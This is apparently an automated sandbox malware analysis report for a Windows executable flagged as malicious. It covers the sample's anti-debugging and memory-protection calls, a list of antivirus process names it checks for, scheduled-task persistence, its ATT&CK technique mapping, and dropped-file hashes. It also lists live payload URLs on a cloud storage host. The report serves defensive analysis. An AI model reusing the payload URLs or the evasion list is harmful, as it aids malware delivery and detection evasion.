Source: C:\Users\user\Documents\WMZOAN.exeAPI coverage: 2.7 %
Source: C:\Users\user\Desktop\2362476847-83854387.07.exe TID: 6592Thread sleep count: 545 > 30Jump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exe TID: 6592Thread sleep time: -272500s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exe TID: 6592Thread sleep count: 454 > 30Jump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exe TID: 6592Thread sleep time: -227000s >= -30000sJump to behavior
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_00007FFB23B0A1B8 FindFirstFileExW,12_2_00007FFB23B0A1B8
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.00000000004CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Documents\WMZOAN.exeAPI call chain: ExitProcess graph end nodegraph_12-14044
Source: C:\Users\user\Documents\WMZOAN.exeAPI call chain: ExitProcess graph end nodegraph_12-14388
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_00000001400073E0 LdrLoadDll,12_2_00000001400073E0
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0000000140007C91
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_000000014000F000
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,12_2_0000000140004630
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0000000140007C91
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00000001400106B0
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_00000001400092E0 SetUnhandledExceptionFilter,12_2_00000001400092E0
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_00007FFB23B01F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FFB23B01F50
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_00007FFB23B076E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FFB23B076E0
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_00007FFB23B02630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FFB23B02630

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Documents\WMZOAN.exeNtAllocateVirtualMemory: Indirect: 0x140006FD0Jump to behavior
Source: C:\Users\user\Documents\WMZOAN.exeNtProtectVirtualMemory: Indirect: 0x2A3B253Jump to behavior
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_00007FFB23B0FD40 cpuid 12_2_00007FFB23B0FD40
Source: C:\Users\user\Documents\WMZOAN.exeCode function: GetLocaleInfoA,12_2_000000014000F370
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,12_2_000000014000A370
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,12_2_0000000140005A70
Source: WMZOAN.exe, 0000000C.00000002.2247117123.0000000002808000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
Source: WMZOAN.exe, 0000000C.00000002.2247117123.0000000002808000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: vsserv.exe
Source: WMZOAN.exe, 0000000C.00000002.2247117123.0000000002808000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avcenter.exe
Source: WMZOAN.exe, 0000000C.00000002.2247117123.0000000002808000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
Source: WMZOAN.exe, 0000000C.00000002.2247117123.0000000002808000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avp.exe
Source: WMZOAN.exe, 0000000C.00000002.2247117123.0000000002808000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
Source: WMZOAN.exe, 0000000C.00000002.2247117123.0000000002808000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
Source: WMZOAN.exe, 0000000C.00000002.2247117123.0000000002808000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
Source: WMZOAN.exe, 0000000C.00000002.2247117123.0000000002808000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
Source: WMZOAN.exe, 0000000C.00000002.2247117123.0000000002808000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
Source: WMZOAN.exe, 0000000C.00000002.2247117123.0000000002808000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
Source: WMZOAN.exe, 0000000C.00000002.2247117123.0000000002808000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: AYAgent.aye
Source: WMZOAN.exe, 0000000C.00000002.2247117123.0000000002808000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
Source: WMZOAN.exe, 0000000C.00000002.2247117123.0000000002808000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
Source: WMZOAN.exe, 0000000C.00000002.2247117123.0000000002808000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
Source: WMZOAN.exe, 0000000C.00000002.2247117123.0000000002808000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,12_2_00000001400042B0
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,12_2_0000000140003F80
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
Service Execution
24
Windows Service
1
Access Token Manipulation
31
Masquerading
1
Credential API Hooking
1
System Time Discovery
Remote Services1
Credential API Hooking
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Native API
1
DLL Side-Loading
24
Windows Service
1
Virtualization/Sandbox Evasion
LSASS Memory131
Security Software Discovery
Remote Desktop Protocol1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Process Injection
1
Access Token Manipulation
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Abuse Elevation Control Mechanism
1
Process Injection
NTDS1
Process Discovery
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
DLL Side-Loading
1
Abuse Elevation Control Mechanism
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Obfuscated Files or Information
Cached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading
DCSync123
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
2362476847-83854387.07.exe22%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Users\user\Documents\WMZOAN.exe0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifp0%Avira URL Cloudsafe
https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gif0%Avira URL Cloudsafe
https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.gif0%Avira URL Cloudsafe
https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gif&0%Avira URL Cloudsafe
https://a8mw1y.oss-cn-beijing.aliyuncs.com/7-2476756634-1003he0%Avira URL Cloudsafe
https://a8mw1y.oss-cn-beijing.aliyuncs.com/d.gif0%Avira URL Cloudsafe
https://a8mw1y.oss-cn-beijing.aliyuncs.com/i.dat0%Avira URL Cloudsafe
https://a8mw1y.oss-cn-beijing.aliyuncs.com/s.jpg0%Avira URL Cloudsafe
https://a8mw1y.oss-cn-beijing.aliyuncs.com/s.dat0%Avira URL Cloudsafe
https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.gifhttps://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifhttp0%Avira URL Cloudsafe
https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifR0%Avira URL Cloudsafe
https://a8mw1y.oss-cn-beijing.aliyuncs.com/7-2476756634-1003f0%Avira URL Cloudsafe
https://a8mw1y.oss-cn-beijing.aliyuncs.com/c.gif0%Avira URL Cloudsafe
https://a8mw1y.oss-cn-beijing.aliyuncs.com/rt0%Avira URL Cloudsafe
https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.gif.0%Avira URL Cloudsafe
https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifJ0%Avira URL Cloudsafe
https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifcom0%Avira URL Cloudsafe
https://a8mw1y.oss-cn-beijing.aliyuncs.com/0%Avira URL Cloudsafe
https://a8mw1y.oss-cn-beijing.aliyuncs.com/tt0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
a8mw1y.oss-cn-beijing.aliyuncs.com
59.110.190.44
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://a8mw1y.oss-cn-beijing.aliyuncs.com/i.datfalse
    • Avira URL Cloud: safe
    unknown
    https://a8mw1y.oss-cn-beijing.aliyuncs.com/s.jpgfalse
    • Avira URL Cloud: safe
    unknown
    https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.giffalse
    • Avira URL Cloud: safe
    unknown
    https://a8mw1y.oss-cn-beijing.aliyuncs.com/s.datfalse
    • Avira URL Cloud: safe
    unknown
    https://a8mw1y.oss-cn-beijing.aliyuncs.com/d.giffalse
    • Avira URL Cloud: safe
    unknown
    https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.giffalse
    • Avira URL Cloud: safe
    unknown
    https://a8mw1y.oss-cn-beijing.aliyuncs.com/c.giffalse
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifp2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://a8mw1y.oss-cn-beijing.aliyuncs.com/7-2476756634-1003he2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://ocsp.thawte.com0189atohci.sys.0.dr, WMZOAN.exe.0.drfalse
      high
      https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.gifhttps://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifhttp2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gif&2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://www.symauth.com/cps0(WMZOAN.exe.0.drfalse
        high
        https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifR2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://crl.thawte.com/ThawteTimestampingCA.crl0189atohci.sys.0.dr, WMZOAN.exe.0.drfalse
          high
          https://airsdk.harman.com/runtime2362476847-83854387.07.exefalse
            high
            http://www.symauth.com/rpa00WMZOAN.exe.0.drfalse
              high
              https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.gif.2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://a8mw1y.oss-cn-beijing.aliyuncs.com/2362476847-83854387.07.exe, 00000000.00000003.2099499956.00000000004AB000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://a8mw1y.oss-cn-beijing.aliyuncs.com/7-2476756634-1003f2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://a8mw1y.oss-cn-beijing.aliyuncs.com/rt2362476847-83854387.07.exe, 00000000.00000003.2099499956.00000000004AB000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifJ2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://a8mw1y.oss-cn-beijing.aliyuncs.com/tt2362476847-83854387.07.exe, 00000000.00000003.2099499956.00000000004AB000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://airsdk.harman.com/runtime.kernel32.dll2362476847-83854387.07.exefalse
                high
                https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifcom2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                59.110.190.44
                a8mw1y.oss-cn-beijing.aliyuncs.comChina
                37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1586429
                Start date and time:2025-01-09 04:26:12 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 34s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:14
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:2362476847-83854387.07.exe
                Detection:MAL
                Classification:mal80.evad.winEXE@2/12@1/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 74%
                • Number of executed functions: 6
                • Number of non-executed functions: 105
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                TimeTypeDescription
                06:02:09Task SchedulerRun new task: xANIa path: C:\Users\user\Documents\WMZOAN.exe
                22:27:07API Interceptor941x Sleep call for process: 2362476847-83854387.07.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                59.110.190.442o63254452-763487230.06.exeGet hashmaliciousNitolBrowse
                  2o63254452-763487230.06.exeGet hashmaliciousUnknownBrowse
                    e2664726330-76546233.05.exeGet hashmaliciousNitolBrowse
                      e2664726330-76546233.05.exeGet hashmaliciousUnknownBrowse
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        a8mw1y.oss-cn-beijing.aliyuncs.com2o63254452-763487230.06.exeGet hashmaliciousNitolBrowse
                        • 59.110.190.44
                        2o63254452-763487230.06.exeGet hashmaliciousUnknownBrowse
                        • 59.110.190.44
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd2o63254452-763487230.06.exeGet hashmaliciousNitolBrowse
                        • 118.178.60.9
                        2o63254452-763487230.06.exeGet hashmaliciousUnknownBrowse
                        • 59.110.190.44
                        phish_alert_sp2_2.0.0.0 (1).emlGet hashmaliciousUnknownBrowse
                        • 47.111.150.42
                        e2664726330-76546233.05.exeGet hashmaliciousNitolBrowse
                        • 118.178.60.9
                        e2664726330-76546233.05.exeGet hashmaliciousUnknownBrowse
                        • 59.110.190.44
                        miori.m68k.elfGet hashmaliciousUnknownBrowse
                        • 8.138.112.162
                        sora.ppc.elfGet hashmaliciousUnknownBrowse
                        • 8.151.21.103
                        sora.spc.elfGet hashmaliciousMiraiBrowse
                        • 120.78.217.242
                        sora.arm7.elfGet hashmaliciousMiraiBrowse
                        • 8.152.213.68
                        sora.mips.elfGet hashmaliciousMiraiBrowse
                        • 139.244.36.195
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        37f463bf4616ecd445d4a1937da06e192o63254452-763487230.06.exeGet hashmaliciousNitolBrowse
                        • 59.110.190.44
                        2o63254452-763487230.06.exeGet hashmaliciousUnknownBrowse
                        • 59.110.190.44
                        https://veryfast.io/?ap=adw&as=g_d_fast_in&dm%5Bads%5D=new_static&dm%5Btype%5D=dis&gad_source=5&gclid=EAIaIQobChMIgp352NzmigMVZAOzAB0wMA8oEAEYASAAEgI_hfD_BwEGet hashmaliciousUnknownBrowse
                        • 59.110.190.44
                        z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 59.110.190.44
                        HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                        • 59.110.190.44
                        D7VRkhOECq.exeGet hashmaliciousGuLoaderBrowse
                        • 59.110.190.44
                        KO0q4biYfC.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 59.110.190.44
                        DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 59.110.190.44
                        e2664726330-76546233.05.exeGet hashmaliciousNitolBrowse
                        • 59.110.190.44
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\Users\user\Documents\WMZOAN.exe2o63254452-763487230.06.exeGet hashmaliciousNitolBrowse
                          2o63254452-763487230.06.exeGet hashmaliciousUnknownBrowse
                            e2664726330-76546233.05.exeGet hashmaliciousNitolBrowse
                              e2664726330-76546233.05.exeGet hashmaliciousUnknownBrowse
                                23567791246-764698008.02.exeGet hashmaliciousUnknownBrowse
                                  287438657364-7643738421.08.exeGet hashmaliciousNitolBrowse
                                    287438657364-7643738421.08.exeGet hashmaliciousUnknownBrowse
                                      2749837485743-7684385786.05.exeGet hashmaliciousNitolBrowse
                                        2749837485743-7684385786.05.exeGet hashmaliciousUnknownBrowse
                                          2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                                            Process:C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                            Category:dropped
                                            Size (bytes):10681
                                            Entropy (8bit):7.866148090449211
                                            Encrypted:false
                                            SSDEEP:192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
                                            MD5:10A818386411EE834D99AE6B7B68BE71
                                            SHA1:27644B42B02F00E772DCCB8D3E5C6976C4A02386
                                            SHA-256:7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
                                            SHA-512:BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                            Process:C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                            Category:dropped
                                            Size (bytes):3892010
                                            Entropy (8bit):7.995495589600101
                                            Encrypted:true
                                            SSDEEP:98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
                                            MD5:E4E46F3980A9D799B1BD7FC408F488A3
                                            SHA1:977461A1885C7216E787E5B1E0C752DC2067733A
                                            SHA-256:6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
                                            SHA-512:9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                            Process:C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):5.3013015844763345
                                            Encrypted:false
                                            SSDEEP:6:WetLMBui9QCrztE+CrCa2BIDR6Ye89r7OdUzW9E40/qcX:2BuUQCrztEJMBIDRFgUzWg3
                                            MD5:C3BE870A726F627202B33B6AAD385CC2
                                            SHA1:CA594F5841AAEC1E2A765F4CE1FACA56DF0F3741
                                            SHA-256:F3E55A5CDCA6DB81E9FE1B1321174D057F6967382ACF98162C0DFE877AA78269
                                            SHA-512:926DFAA48EF276776143B35C188130E0FB69C6A68DB7737024AC009C3E4348C7976D464F48A11C7A7396A8CABD0EEA9420FF6AAA49657B1A790DB77E4BAF79DB
                                            Malicious:false
                                            Reputation:low
                                            Preview:....l%00Q.]Gv>i([[.K%f).GDG@'n!,EUYB!1l!NL.@n')&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyy.A..?w a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33R.^Du=j+XX.H&e*-DGDC$m"/FVZA"2o"MO.Ao&('''''''''''''''''''''''''''''''''OSSW$mxx.@..>v!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6|ylllllllllllllllllllllllllllllllllllll
                                            Process:C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                            Category:dropped
                                            Size (bytes):125333
                                            Entropy (8bit):7.993522712936246
                                            Encrypted:true
                                            SSDEEP:3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
                                            MD5:2CA9F4AB0970AA58989D66D9458F8701
                                            SHA1:FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
                                            SHA-256:5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
                                            SHA-512:AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                            Process:C:\Users\user\Desktop\2362476847-83854387.07.exe
